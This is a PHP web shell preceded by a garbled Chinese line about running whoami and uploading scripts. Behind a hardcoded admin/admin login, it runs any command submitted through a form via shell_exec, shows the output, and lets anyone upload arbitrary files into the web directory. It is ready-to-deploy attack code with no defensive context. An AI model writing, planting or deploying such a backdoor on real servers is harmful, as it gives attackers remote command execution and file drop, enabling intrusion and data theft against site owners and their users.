whoami 可使用脚本 上执行传
<?php
session_start();
function is_windows() {
return strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
}
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($_POST['username'] == 'admin' && $_POST['password'] == 'admin') {
$_SESSION['authenticated'] = true;
}
}
if (!isset($_SESSION['authenticated'])) {
echo '<form method="post" style="text-align:center;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);">
<label>Username: <input type="text" name="username"></label><br>
<label>Password: <input type="password" name="password"></label><br>
<input type="submit" value="Login">
</form>';
exit();
}
if (isset($_POST['command'])) {
$command = $_POST['command'];
if (is_windows()) {
$output = shell_exec($command);
} else {
$output = shell_exec($command . ' 2>&1');
}
echo nl2br(htmlspecialchars($output));
}
if (isset($_FILES['uploaded_file'])) {
move_uploaded_file($_FILES['uploaded_file']['tmp_name'], './' . basename($_FILES['uploaded_file']['name']));
echo "File uploaded successfully.";
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Command Execution</title>
</head>
<body>
<h1>Execute Command</h1>
<form method="post">
<label>Command: <input type="text" name="command"></label><br>
<input type="submit" value="Execute">
</form>
<h1>Upload File</h1>
<form enctype="multipart/form-data" method="post">
<label>File: <input type="file" name="uploaded_file"></label><br>
<input type="submit" value="Upload">
</form>
</body>
</html>